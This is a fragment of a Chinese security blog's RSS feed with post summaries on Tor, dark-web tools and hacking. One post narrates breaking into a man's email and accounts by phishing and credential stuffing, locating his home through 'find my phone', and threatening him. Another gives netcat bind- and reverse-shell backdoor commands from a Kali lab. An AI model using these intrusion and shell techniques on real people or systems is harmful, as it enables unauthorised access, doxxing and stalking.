很明显我当时钻了牛角尖，一拍大腿，我可以登录QQ邮箱啊，为了避免再出现异地登录的情况，这次我用代理了安徽的IP，这次很顺畅进去了他的邮箱。&#xA;我在他邮箱里看到最近三个月频繁给一个名：kon***@sina.com的新浪邮箱发邮件，而每封邮件里都有一个附件，打开附件的Word文档全是某个女生的个人信息，包括照片，姓名，身份，毕业学校，兴趣爱好，父母家人等非常详细的信息。&#xA;我还翻到了他出售李琴个人信息的邮件，标题非常龌蹉！&#xA;随后我尝试撞库攻击他的其他社交帐号，再次追查他手机号绑定了哪些社交帐号&#xA;我查到他在18年注册了OPPO的帐号，用刚刚钓鱼来的QQ密码试着登陆一下，还真是同一个密码！&#xA;突然想起OPPO手机有个查找手机功能，这是手机丢失后提供给用户找回手机功能的。&#xA;而我利用这个功能知道了他家的大概区域&#xA;安徽毫州拓佳欢乐广场附近&#xA;我并没有停止撞库攻击，尝试登陆他的12306帐号，嚯！没想到这厮连那么重要的网站都用同一个密码，赶紧点开个人信息查看。&#xA;那么目前已经知道他的真实身份，跟李琴网恋并且倒卖她信息的人叫刘*俊，26岁，住在安徽亳州某个广场附近，年龄在23岁&#xA;现在买家的线索也浮出了水面，我打算顺着刘X俊这条线索调查跟李琴见面的人是谁。&#xA;0x05 买家浮出水面 我保留了他贩卖信息的证据后，选择跟他聊一聊，换了张不记名的电话卡之后，给他打了个电话，但一直不肯接，要么就是直接挂断了，打了五六个我给他编辑了条短信。&#xA;我跟他说已经掌握了他犯罪的证据，问几个问题，老实说我就放过你，不然就送你进去。&#xA;我问他这些信息都是从哪来的那么详细，他说：“都是跟她们网恋慢慢钓出来的”。&#xA;我顺着问：“你把这些信息卖给了谁，你跟他从哪里认识的？“&#xA;暗网的一个论坛上，他当时发了一个帖子，收网恋对象的信息。</description>
    </item>
    <item>
      <title>使用百度地图JavaScript API遇到的暗坑</title>
      <link>https://anwangtanmi.github.io/posts/0eb7843156ee51d29293a4ce47e9c5d8/</link>
      <pubDate>Mon, 07 Jan 2019 17:03:44 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/0eb7843156ee51d29293a4ce47e9c5d8/</guid>
      <description>一、介绍 项目中使用了微信定位，由于使用了百度地图JavaScript API来把微信坐标转换成百度坐标，在使用百度坐标转换成百度中文地址，遇到一些郁闷的坑，在这里面介绍一下。&#xA;二、说明 百度API官网地址：http://lbsyun.baidu.com/index.php?title=jspopular&#xA;js中把微信坐标转换成百度坐标&#xA;var longitude = 116.40718; // 微信经度 var latitude = 39.978207; // 微信纬度 console.log(&#34;微信经度：&#34;+longitude); console.log(&#34;微信纬度：&#34;+latitude); // 转换成百度地图坐标和地址 var lng = &#39;&#39;;&#x9;//百度经度 var lat = &#39;&#39;;&#x9;//百度纬度 var address = &#39;&#39;;&#x9;//百度地址 var convertor = new BMap.Convertor(); var ggPoint = new BMap.Point(longitude, latitude); var pointArr = []; pointArr.push(ggPoint); convertor.translate(pointArr, 1, 5, function (data){ if(data.status === 0) { lng = data.points[0].lng; lat = data.points[0].lat; console.log(&#34;调取转换坐标后：百度经度：&#34;+lng); console.</description>
    </item>
    <item>
      <title>网站勘验：WFS十大升级亮点，提高取证效率</title>
      <link>https://anwangtanmi.github.io/posts/63b54889ca33e301ee15eac19a0b3dce/</link>
      <pubDate>Thu, 03 Jan 2019 15:18:54 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/63b54889ca33e301ee15eac19a0b3dce/</guid>
      <description>WFS一直朝着自己的目标不断前进,已经是一个成熟的软件了（前情回顾：WFS支持暗网取证）,这次它又带来哪些惊喜升级，快来看看：&#xA;新增功能&#xA;1.内置浏览器资源下载功能&#xA;支持对浏览器中的视频、图片、音频、文档及其他类型文件进行下载。（仅支持有下载链接的）&#xA;2.视频嗅探功能&#xA;支持对YouTube，Facebook、twitter、百度贴吧及更多网站嗅探出的视频进行下载。&#xA;3.客户端取证日志记录功能&#xA;支持对取证过程进行记录，实时查看取证状态。&#xA;4.取证图片批量导出功能&#xA;支持图片批量导出，同时可以对导出的图片进行重命名。&#xA;新增取证模板&#xA;5.iCloud云盘取证模板&#xA;支持对邮件、通讯录、照片、iCloud云盘、备忘录进行网页固定取证。&#xA;6.Discuz论坛取证模板&#xA;支持对论坛主页、我的好友、我的帖子、我的评论、我收藏的帖子进行网页固定取证。&#xA;7.PHPBB论坛取证模板&#xA;支持对论坛主页、我的好友、我的帖子、我的评论、我收藏的帖子进行网页固定取证。&#xA;8.QQ空间取证模板&#xA;支持对个人信息、用户说说、用户日志、用户相册、留言板进行网页固定取证。&#xA;9.QQ邮箱、163邮箱原始邮件下载功能&#xA;QQ邮箱、163邮箱取证模板中新增对收信箱、发件箱、已发送、草稿箱中的原始邮件进行批量下载。&#xA;程序优化&#xA;10.程序优化&#xA;◆优化客户端界面卡顿问题；&#xA;◆优化笔记本电脑卡顿问题；&#xA;◆针对不同配置的电脑做差异化优化，解决因资源消耗过高引起取证卡顿问题；&#xA;◆修复了旧版其他Bug。</description>
    </item>
    <item>
      <title>Tor: The Second-Generation Onion Router</title>
      <link>https://anwangtanmi.github.io/posts/5ad94b8de0ffb69f5d231403a0a8b196/</link>
      <pubDate>Mon, 26 Nov 2018 21:50:26 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/5ad94b8de0ffb69f5d231403a0a8b196/</guid>
      <description>Tor: The Second-Generation Onion Router&#xA;作者：R Dingledine ，N Mathewson ，P Syverson 出版源：《Journal of the Franklin Institute》 , 2004&#xA;一、Tor是什么Tor一种基于电路的低延迟匿名通信服务。第二代洋葱路由系统通过添加完美的前向匿名，拥塞控制，目录服务器，完整性检查，可配置的退出策略以及通过聚合点实现位置隐藏服务的实用设计来解决原始设计中的限制。&#xA;二、Tor设计目标&#xA;Babel、Mix-masterMixminion&#xA;较大和可变的延迟为代价实现匿名化&#xA;Anonymizer&#xA;易于分析，但用户必须信任匿名代理&#xA;Crowds&#xA;任何节点都可以读取用户的流量&#xA;Herbivore、P5 广播响应来隐藏发起者&#xA;Tor在匿名性，可用性和效率之间提供合理的权衡，实现通信的发起者与接受者被匿名保护。 在文中引导Tor演变目标： 可部署性、可用性、灵活性和设计简单。&#xA;补充：Tor网络工作原理&#xA;三、Tor设计&#xA;每个洋葱路由器都与每个其他洋葱路由器（OR）保持TLS 连接。每个用户运行称为洋葱代理（OP）的本地软件来获取目录，在网络上建立电路，以及处理来自用户应用程序的连接。这些OP接受TCP流并在电路中复用它们。电路另一侧的OR连接到请求的目的地并中继数据。 OR维护有两个key： （1）长期身份key （2）短期洋葱key&#xA;Tor数据单元&#xA;中继单元&#xA;为了降低性能的开销，Tor在建立连接时使用RSA进行加密，而在传输数据的时候则使用速度较快的AES加密。 DH算法中gx为前半部分，gy为后半部分。 会话密钥k=gxgy。&#xA;Alice构建了一个两跳电路并开始获取网页。&#xA;中继数据： 链路已建立好，与链路上每个OR分享密钥。 OR接到relay后，查找此数据包对应链路，并用对应会话密钥解密中继头部和有效载荷。 若是从A发送过来的，OR检查该数据包摘要是否有效。若有效，接收并处理中继单元。OR找到circID和下一跳OR地址，发送解密后的数据包给下一跳OR。OR在解密过程中，还要对数据包进行填充。&#xA;电路拆除： A发送了destroy数据包，电路上每个OR收到后，关闭电路上的所有数据流，并发送一个新的destroy数据包给下一跳。同建立一条链路一样，链路的拆除也是逐步进行的。A若想改变电路，A会给链路中某个OR发送一个relay truncate数据包，OR收到后，向它的下一跳转发一个destroy命令数据包，并向A回复一个relay truncated数据包，这样后面的链路就会终止。&#xA;打开和关闭数据流：当某用户的应用程序想要与给定地址和端口建立TCP连接，会要求OP通过socks建立连接。OP选一新的（或根据需要创建一条）电路，然后在电路上选一个合适的OR作为出口节点。OP通过使用新的随机身份标识符将中继开始单元发送到出口节点来打开流。一旦出口节点连接到远程主机，它就会以中继连接的单元响应。OP收到后发送socks回复通知应用程序成功。OP接受来自应用程序TCP流的数据，将其打包到中继数据单元中，并将这些单元沿着电路发送到所选的OR。&#xA;数据流的完整性检验：旧的洋葱路由设计使用了流密码而没有进行完整性检查。 Tor仅在每条数据流的边缘进行完整性检查。（在我们的漏管电路拓扑中，流的边缘可能是电路中的任何跳）。&#xA;速率限制和公平：Tor服务器使用令牌桶方法来强制执行传入字节的长期平均速率，同时仍允许短期突发超过允许的带宽。 目前常用流量限制方法： （1）漏桶算法 （2）令牌桶算法&#xA;拥塞控制：（1）电路级限制 为了控制电路的带宽，每个OR跟踪两个窗口。 打包窗口 传送窗口 （2）流级别限制 OR和OP使用relay sendme单元来实现跨电路的各个流的端到端流控制。&#xA;四、集合点和位置隐藏服务&#xA;集合点是Tor网络中位置隐藏服务（也称为响应者匿名）的构建块。位置隐藏服务允许提供TCP服务，例如网络服务器，而不会泄露他的IP地址。 针对位置隐藏服务的设计具有以下目标： 访问控制、健壮性 、涂抹阻力（smear-resistance） 、应用程序透明度。</description>
    </item>
    <item>
      <title>全球最大暗网托管网站被黑–6500个暗网服务</title>
      <link>https://anwangtanmi.github.io/posts/b0d6492bf106a448ed685679ffe19d0a/</link>
      <pubDate>Mon, 19 Nov 2018 16:17:45 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/b0d6492bf106a448ed685679ffe19d0a/</guid>
      <description>时间：2018年11月15- 10:06 PM&#xA;事件：全球最大的暗网托管网站被黑&#xA;后果：所有托管的暗网服务均被删除，由于架构原因，所有数据都已经丢失，且无法恢复&#xA;后续：恢复服务时间暂定为12月份&#xA;黑客利用手段：弱口令（phpmyadmin/adminer） WTF ，so easy的口令&#xA;参考链接：官网公告</description>
    </item>
    <item>
      <title>【匿名通信】在Debian上安装运行tor和nyx并使用stem库</title>
      <link>https://anwangtanmi.github.io/posts/2d776496cb49d2522c39a3b0672c0b3f/</link>
      <pubDate>Mon, 10 Sep 2018 14:00:03 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/2d776496cb49d2522c39a3b0672c0b3f/</guid>
      <description> #1.安装运行tor apt-get install tor #2.安装python apt-get install python-pip #3.更新全部pip库，写一个更新脚本 vim pipupgrade.py import pip from subprocess import call for dist in pip.get_installed_distributions(): call(&#34;pip install --upgrade &#34; + dist.project_name, shell=True) python pipupgrade.py #4.安装 stem和pymysql pip install stem pymysql #5.在目录/etc/tor下添加多用户base配置文件torrc.1 #如果只有单用户这步可以不要 vim /etc/tor/torrc.1 SocksPort 9060 ControlPort 9061 DataDirectory /var/lib/tor1 CookieAuthentication 1 #6.安装nyx apt-get update apt-get upgrade pip install nyx #7.运行nyx nyx #重启tor kill pidoftor /usr/bin/tor </description>
    </item>
    <item>
      <title>华住数据泄露事件对你造成的影响？</title>
      <link>https://anwangtanmi.github.io/posts/d8a3776697bdfbf104f28721ef4ea3fd/</link>
      <pubDate>Sun, 02 Sep 2018 21:17:24 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/d8a3776697bdfbf104f28721ef4ea3fd/</guid>
      <description>最近，华住酒店集团用户信息泄露事件引发社会高度关注和热议，截图显示泄露的数据1.23亿条官网注册资料、1.3亿条入住登记身份信息以及2.4亿条详细开房记录，共140G资料&#xA;本次数据泄露波及华住集团旗下汉庭、美爵、禧玥、漫心、诺富特、美居、CitiGo、桔子、全季、星程、宜必思、怡莱、海友等多个酒店。&#xA;泄露信息包括客户的姓名、×××号、手机号、邮箱、家庭住址，开房信息（包括开房人员、开放时间、离开时间、房间号、消费金额等）经过对数据的简单测试，这些泄露信息的真实性是毋庸置疑的&#xA;1.泄露信息核对&#xA;2.精确到秒的开房信息&#xA;作为一个普通人，我们暂且不探究数据是怎么泄露的，假设我们是数据泄露名单中的一员，那这些信息会给我们带来怎样的影响呢？&#xA;1、广告电话、推销电话，对个人生活和工作造成干扰。&#xA;2、精准诈骗。诈骗分子收集用户信息，形成个人数据画像，再实施进一步的诱骗活动&#xA;3、被黑产产业利用。像薅羊毛和刷单产业，可以利用这些个人信息注册账号，对正常的互联网营销造成较大影响&#xA;4、被撞库，更多的信息面临被泄露的风险。很多用户可以说是‘一套密码走天下’，即在任何地方都使用同一套密码，这样的话就增加了撞库的风险，撞库指黑客通过收集互联网已泄露的用户和密码信息，生成对应的字典表，尝试批量登陆其他网站后，得到一系列信息登录的用户)的可能性。&#xA;不过，即便不幸出现了撞库，用户也不必过于恐慌。一些重要的互联网服务平台，比如微信、支付宝、淘宝等，单纯依靠账号密码并不能正常登录，还需要更多的验证信息，包括手机验证码、密保问题等。所以拿这些数据去撞库，得到的往往都是一些不太重要的服务。&#xA;公众企业对客户隐私信息的保护应该放在首位，做好安全管理工作，降低大批量数据泄露事件发生的可能性。而我们自己也应该建立起信息安全意识，定期更换密码、不使用弱口令密码、不同账号使用不同密码，来减少被暴力破解和撞库的可能性。</description>
    </item>
    <item>
      <title>nyx(Tor的命令行监视器)的安装与使用</title>
      <link>https://anwangtanmi.github.io/posts/99b6ccdbce9671db8fb3a044d3d5672b/</link>
      <pubDate>Mon, 20 Aug 2018 15:24:37 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/99b6ccdbce9671db8fb3a044d3d5672b/</guid>
      <description>一.前景 为了对tor网络中继节点流量和带宽进行分析,使用tor官方的nyx工具.&#xA;运行环境:Ubuntu16.04&#xA;nyx主页,可能需要翻墙&#xA;二.安装 1.安装pip # 1. 更新系统包 sudo apt-get update sudo apt-get upgrade # 2. 安装Pip sudo apt-get install python-pip # 3. 检查 pip 是否安装成功 pip -V 2.安装nyx sudo pip install nyx ps:可能会出现如下问题&#xA;Command “python setup.py egg_info” failed with error code 1 in /tmp/pip-install-PF33Fn/nyx/&#xA;解决办法：&#xA;sudo python -m pip install --upgrade --force pip sudo pip install setuptools==33.1.1 三.使用 1.运行tor cd ~/tor/tor-0.3.3.9/src/or tor 2.修改配置文件torrc 运行tor后，不要Ctrl+C（会结束tor程序），要重开一个终端窗口；&#xA;分为两种情况修改torrc：&#xA;1.如果你安装tor浏览器：&#xA;~/tor/tor-browser_en-US/Browser/TorBrowser/Data/Tor vim torrc 2.</description>
    </item>
    <item>
      <title>【匿名通信】在Linux(Ununtu 16.04)环境下编译运行tor源码</title>
      <link>https://anwangtanmi.github.io/posts/06295e0cc22854ad98559d8753c912cd/</link>
      <pubDate>Sat, 21 Jul 2018 03:08:08 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/06295e0cc22854ad98559d8753c912cd/</guid>
      <description>1.准备工作&#xA;（1）安装make工具&#xA;sudo apt-get install make （2）安装gcc&#xA;sudo apt-get install build-essential （3）创建目录&#xA;mkdir tor-build cd tor-build 2.安装libevent sudo apt-get install libevent-dev 3.安装openssl&#xA;sudo apt-get install libssl-dev 4.安装zlib sudo apt-get install zlib1g-dev 5.编译安装运行tor源码&#xA;（1）官网下载源码并且解压&#xA;wget http://www.theonionrouter.com/dist/tor-0.3.3.9.tar.gz tar zxvf tor-0.3.3.9.tar.gz cd tor-0.3.3.9 （2）运行配置文件&#xA;./configure （3）编译、安装&#xA;make install （4）运行&#xA;cd ./src/or tor 运行结果：&#xA;Jul 20 18:55:34.380 [notice] Tor 0.3.3.9 (git-45028085ea188baf) running on Linux with Libevent 2.0.21-stable, OpenSSL 1.0.2g, Zlib 1.2.8, Liblzma N/A, and Libzstd N/A.</description>
    </item>
    <item>
      <title>后门与远控木马——Meterpreter初体验</title>
      <link>https://anwangtanmi.github.io/posts/c66ff35bee5955f7391234e490b2de2f/</link>
      <pubDate>Tue, 27 Mar 2018 11:38:15 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/c66ff35bee5955f7391234e490b2de2f/</guid>
      <description>后门与远控木马——msfvenom与Meterpreter初体验 实验环境 攻击机 kali 4.14(64位) (IP: 10.0.2.6/24) 靶机 ubuntu 16.04(32位) (IP: 10.0.2.4/24) windows 7 sp1(64位) (IP: 10.0.2.7/24) nc/ncat的使用 nc（全称是netcat）是一个用于TCP/UDP连接和监听的linux工具，有着网络工具中的“瑞士军刀”的美誉。nc的实现版本大致有两种，一种是带有-e或-c 选项可以直接给出执行命令，另一种不支持-e选项。&#xA;ncat是nmap项目的一部分，在安装nmap的时候会自动安装ncat。ncat号称“21世纪的netcat”，是对netcat的重新实现和升级，而且功能更加强大（如ssl加密、代理连接通过socks4 获取http）&#xA;nc的监听模式在kali下会出现问题，监听的端口会发生变化，因此推荐同学们在kali下使用ncat。&#xA;nc后门获得win/linux shell 在win7靶机下载netcat后，进入netcat所在文件夹，在命令提示符中输入nc -L -e cmd.exe -p 80启动后门服务。&#xA;-L 选项或-l选项是将nc设置为监听模式。-p 选项指定监听的端口（混淆为80，53等端口往往能穿透防火墙），-e 选项可以绑定到cmd.exe这个shell程序。&#xA;在攻击机中输入nc 10.0.2.7 80连接到win7靶机，获得win7的shell。&#xA;ubuntu自带的nc版本没有-e 选项，当然可以用ncat替代，这里展示一下没有-e 选项的nc如何获得shell。（参考man手册）&#xA;输入&#xA;$ rm -f /tmp/f; mkfifo /tmp/f $ cat /tmp/f | /bin/sh -i 2&amp;gt;&amp;amp;1 | nc -l 1234 &amp;gt; /tmp/f 攻击机连接后，得到shell&#xA;nc获得win/linux反弹shell 前面的示例都是靶机作为服务器，监听攻击机的TCP连接。下面我们让靶机主动连接攻击机，获得反弹式shell。&#xA;在攻击机中输入ncat -vv -l 9190进入监听模式，-vv选项提供详细的状态输出。&#xA;靶机中输入nc 10.</description>
    </item>
    <item>
      <title>kali下ONIOFF，暗网链接可用性检测</title>
      <link>https://anwangtanmi.github.io/posts/4790f3617870730296937c8d76ada887/</link>
      <pubDate>Wed, 28 Feb 2018 09:56:33 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/4790f3617870730296937c8d76ada887/</guid>
      <description> 参考：&#xA;https://www.youtube.com/watch?v=lPBYH5hiojY&#xA;https://github.com/k4m4/onioff&#xA;cd /tmp git clone https://github.com/k4m4/onioff cd onioff sudo pip install -r requirements.txt python onioff.py -h service tor start python onioff.py -f onion.txt -o output.txt #自动检测onion里面的暗网链接是否正常，然后把结果输出到output里面 onion.txt </description>
    </item>
    <item>
      <title>kali下一个虚假的tor访问方案</title>
      <link>https://anwangtanmi.github.io/posts/26773355aa615d4e0d19816d1361919d/</link>
      <pubDate>Wed, 28 Feb 2018 09:51:23 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/26773355aa615d4e0d19816d1361919d/</guid>
      <description>1、并没有真的安装tor浏览器，但是却使用了tor的服务、&#xA;2、项目地址：https://github.com/susmithHCK/torghost&#xA;3、使用说明，可以直接在项目地址查看使用说明。&#xA;通过tor官方的检查，识别你使用了tor服务，其实你用的是自己的浏览器，只是开了一个代理。</description>
    </item>
    <item>
      <title>追踪电脑或手机（已知目标IP或mac）进行物理定位</title>
      <link>https://anwangtanmi.github.io/posts/147ae9df2daccabaa75bf4c9a4df4923/</link>
      <pubDate>Wed, 28 Feb 2018 09:50:41 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/147ae9df2daccabaa75bf4c9a4df4923/</guid>
      <description>仅供学习娱乐测试。 iplocator.pl代码：&#xA;#!/usr/bin/perl # Ip Geolocation #By Alexcerus # Demo : https://www.youtube.com/watch?v=0Eq3d10LQ8c # # API documentation - http://ip-api.com/docs/ # you can see you external ip using this Bash script : # read COUNTRY IP &amp;lt;&amp;lt;&amp;lt; $(wget -qO- http://ip-api.com/line/?fields=countryCode,query); echo $IP $COUNTRY # Now let&#39;s start : use Socket; use Term::ANSIColor; use WWW::Mechanize; use JSON; print color &#39;bold bright_yellow&#39;; print q{ ~o88ooooooooooooo88o~ ouooooo,~oo oo~,ooooouo 8 ~88888. ,88888~ 8 8 go~~~os go~~~os 8 8 ,8` &#39;8_8` &#39;8.</description>
    </item>
    <item>
      <title>Windows 下渗透测试系统 DVWA 的部署</title>
      <link>https://anwangtanmi.github.io/posts/089d7e10f5d60419f1310ce4549234d9/</link>
      <pubDate>Sat, 13 Jan 2018 00:56:32 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/089d7e10f5d60419f1310ce4549234d9/</guid>
      <description>DVWA介绍 DVWA（Damn Vulnerable WebApplication）是一个基于PHP和MySQL的Web应用，用于学习与审计Web漏洞、测试安全技能的工具，比如检查代码中是否存在SQL注入、XSS攻击等安全漏洞。&#xA;PHP环境部署 因为DVWA是用PHP编写的，因此需要搭建PHP运行环境。常见的集成环境有phpStudy、XAMPP等，这里我使用的是phpStudy，其安装十分便捷。可以从官网（http://www.phpstudy.net/）下载。&#xA;当出现如图两个绿点表示正常运行。如果出现Apache启动后又停止的情况，可能是端口冲突，你可以更换http服务的默认80端口试一下，当然也不排除是其他原因造成的。&#xA;DVWA的部署 从DVWA官网（http://www.dvwa.co.uk/）直接下载，然后解压到你的phpStudy安装目录下的WWW文件夹中，比如笔者的D:\Program Files\phpStudy\WWW\DVWA-master。&#xA;此时在浏览器中输入http://:/DVWA-master/setup.php会提示一段错误信息。你需要根据提示将config文件夹下的config.inc.php.dist中的$_DVWA[ ‘db_password’ ] = ‘p@ssw0rd’; 改成 $_DVWA[‘db_password’ ] = ‘root’;。因为我们的MySQL用户名、密码默认都是root，再复制一份到config文件夹下，重命名为config.inc.php，此时再打开网址就会变成下图：&#xA;点击Create/Reset Database，创建数据库。随后页面自动跳转到login.php，输入用户名admin，密码password后点击Login即可登录。&#xA;登陆后出现DVWA的主页面，表示环境配置成功。&#xA;ENJOY IT!</description>
    </item>
    <item>
      <title>网络安全相关网站</title>
      <link>https://anwangtanmi.github.io/posts/46920f21a1d27730bc4fbf9c54c5b606/</link>
      <pubDate>Tue, 07 Nov 2017 14:02:49 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/46920f21a1d27730bc4fbf9c54c5b606/</guid>
      <description> Dom Xss Test Cases Wiki ：https://code.google.com/archive/p/domxsswiki/ 黑客之门(有很多网络安全相关的网站的链接)：http://www.hackerdoor.com/ 红黑联盟：https://www.2cto.com/ T00LS： https://www.t00ls.net/ 暗安全技术小组：http://forum.cnsec.org/ freebuf：http://www.freebuf.com </description>
    </item>
    <item>
      <title>【安全牛学习笔记】TOR</title>
      <link>https://anwangtanmi.github.io/posts/0239eaf00d723604534d71e1556075b1/</link>
      <pubDate>Thu, 07 Sep 2017 18:07:47 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/0239eaf00d723604534d71e1556075b1/</guid>
      <description>保护隐私防止被追踪&#xA;志愿者组成&#xA;长期在天朝完全无法使用&#xA;感谢 云&#xA;暗网&#xA;互联网搜索引擎无法发现&#xA;互联网黑市&#xA;下载和看视频是不道德的行为&#xA;互联网黑市交易的货币是比特币&#xA;比特币很难在互联网复原&#xA;下载&#xA;http://www.torproject.org/download/download-easy.html.en#linux&#xA;http://pan.baidu.com/s/1sjkdPO5&#xA;问题1：should not be run as root;&#xA;问题2：服务启动错误&#xA;a&#xA;暗网wiki&#xA;http://zqktlwi4fecv6ri.onion/wiki/index.php/main_Page&#xA;root@kali:~/Desktop# ls -l&#xA;-rwxr-xr-x 1 root root 251 6月 15 14:41 goagent-gtk.desktop&#xA;-rwxrwx— 1 root root 44083644 6月 15 10:27 tor-browser-linux64-4.5.1_zh-CN&#xA;drwx—— 3 1000 inetsim 4096 6月 15 18:23 tor-browser_zh-CN&#xA;root@kali:~/Desktop# chown -R root:root tor-browser_zh-CN/ //赋予执行权限&#xA;root@kali:~/Desktop# ls -l&#xA;-rwxr-xr-x 3 root root 44083644 6月 15 10:27 tor-browser_linux64-4.</description>
    </item>
    <item>
      <title>2.网络入侵方法及IPS产品防护能力测试方法</title>
      <link>https://anwangtanmi.github.io/posts/6b84fd6558a0780ed8d66dfbec9e3267/</link>
      <pubDate>Sat, 15 Jul 2017 20:04:36 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/6b84fd6558a0780ed8d66dfbec9e3267/</guid>
      <description> 时间：2017/07/15 地点：杭州 工作2年，测试IPS产品，整理总结下与入侵检测相关的技术，借此系统性的学习一次。&#xA;02.网络入侵方法及IPS产品防护能力测试方法&#xA;1、 了解网络入侵的目的 作为网络安全防护人员，要想更好的做到网络防御，必须做到有的放矢，因此就需要了解入侵者的思维方式、流程及其手段。通过这些信息利用安全设备和安全检测工具来阻击入侵，对攻击进行溯源取证及安全防护。&#xA;2、 网络入侵一般流程 （1）确定目标 （2）信息收集 （3）漏洞挖掘。包括漏洞扫描和漏洞分析 （4）实施攻击。攻击对象分为网络和主机系统 （5）留下后门。上马，提权 （6）清除日志。隐藏自己&#xA;3、 入侵方法总结 【1】按被入侵对象分： （1）主机渗透方法 口令破解 漏洞攻击 木马攻击 病毒攻击 社会工程 （2）网络攻击方法 拒绝服务攻击 地址欺骗 网络监听 病毒攻击 社会工程 【2】按产品防护功能的实现来区分： （1）入侵攻击 （2）病毒传播 （3）拒绝服务 （4）社会工程 （5）敏感信息外传&#xA;4、入侵防御系统防护能力测试 【1】入侵防御系统防护功能模块 评价一款入侵防御系统产品防护能力是否强大，首先需要具备多种不同的攻击防护模块，也就是具备多种不同的攻击防护能力。在不考虑各模块间耦合问题的情况下，一般防护功能模块越多，防护能力也就越强大。 【2】入侵防御系统防护安全威胁类型 </description>
    </item>
    <item>
      <title>mac工具–通过 arp 欺骗抓取局域网内设备数据包</title>
      <link>https://anwangtanmi.github.io/posts/93db7261dc0cee4c1fb48953bdd65d8f/</link>
      <pubDate>Sun, 01 Nov 2015 10:56:27 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/93db7261dc0cee4c1fb48953bdd65d8f/</guid>
      <description> 使用 Debookee 抓取同局域网内设备数据包，太神奇了。&#xA;因为有个需求，就是想看某手机app内部网络部分是如何实现的，所以要抓取其数据包（主要是 Http 协议部分），Windows 下可以用 Fidder 为手机设置代理实现，Mac 下有一款 Debookee 的软件可以实现同样的功能，但是原理不同 Fidder 设置代理。首先先看截图：&#xA;这是扫出来的局域网内所有主机情况：&#xA;将目标主机设置为 target，此处是我的手机，然后再点击左上角的 Start Dbk，就会抓取到手机上的数据包，如图：&#xA;很神奇，什么都不用设置，只要在 Debookee 上点几下，同个局域网中所有设备数据包我都能监控到了。基于什么原理呢？&#xA;我的另一台 Samsung 电脑打开了 Wireshark 抓取数据包，发现 Debookee 只要一扫描或者对其抓包，就会有满屏幕的 ARP 欺骗–所以原理也就清楚了，是基于 ARP 欺骗的（感谢大哥教导），如图：&#xA;其实很简单，最后，视频演示下吧： http://7xivx9.com1.z0.glb.clouddn.com/debookeeDebookee.mp4&#xA;总的来说，这款工具非常好用！—— Debookee&#xA;另外，还有另一种方式，即通过设置中间代理的方式来抓包，在我的这篇文章中有讲解 Charles 的安装破解与使用&#xA;个人GitHub: http://github.com/icodeu CSDN博客：http://icodeyou.com 个人微信号：qqwanghuan 技术交流 </description>
    </item>
    <item>
      <title>红帽子虚拟机非法关机后，显示网络已被禁用解决方法</title>
      <link>https://anwangtanmi.github.io/posts/3360fabfad2febb5cbd705057b057a82/</link>
      <pubDate>Thu, 03 Sep 2015 16:20:59 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/3360fabfad2febb5cbd705057b057a82/</guid>
      <description>此法适用于原理虚拟机能够正常上网，但是后来多半是因为非法关机，导致网络突然被禁用，笔者常见的现象是虚拟机右上角的“小电脑”呈暗黑色，点击显示网络已被禁用。&#xA;笔者这么乱搞了一通，可以上了，具体原因不明，但是能用就记下。&#xA;1、sudo rm /var/lib/NetworkManager/NetworkManager.state 2、sudo service NetworkManager stop&#xA;3、sudo service NetworkManager start</description>
    </item>
    <item>
      <title>暗藏阴谋？相同漏洞代码的零时差攻击频现</title>
      <link>https://anwangtanmi.github.io/posts/cea30d571dd2cc032f5a7be676818d78/</link>
      <pubDate>Wed, 07 Nov 2012 13:08:38 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/cea30d571dd2cc032f5a7be676818d78/</guid>
      <description>作者：趋势科技资深威胁研究员 Jessa dela Torre /NartVilleneuve&#xA;“Watering Hole（水坑）”是用来描述针对性恶意软件攻击时，攻击者入侵合法网站插入一个“偷渡式”漏洞攻击代码，借此攻击网站访客的流行用语。&#xA;当然，这种攻击并不是最新的。这项技术一直被网络犯罪份子用在无差别攻击，以及针对性恶意软件攻击上。我在2009年和2010 年记录了这种技术，而这里有更多最近的例子。&#xA;虽然网络犯罪份子利用偷渡式漏洞攻击码是为了能够不分对象地攻击入侵更多计算机，而使用这种技术的APT 高级持续性渗透攻击活动则被Shadowserver 恰当地描述为“策略式网站入侵”。目标的选择是针对攻击对象会感兴趣的特定内容。这种攻击通常会结合新的偷渡式漏洞攻击码。&#xA;最近，一个影响微软Internet Explorer 的零时差漏洞攻击码被发现位于跟Nitro 攻击活动有关的服务器上，和最近用来提供Java 零时差漏洞攻击码是同一台服务器。它们的有效负荷都是PoisonIvy。第二个放有Internet Explorer 零时差漏洞攻击码的网站很快就被发现，不过它的有效负荷是PlugX。&#xA;整体而言，我们已经发现了至少 19 个网站包含IE 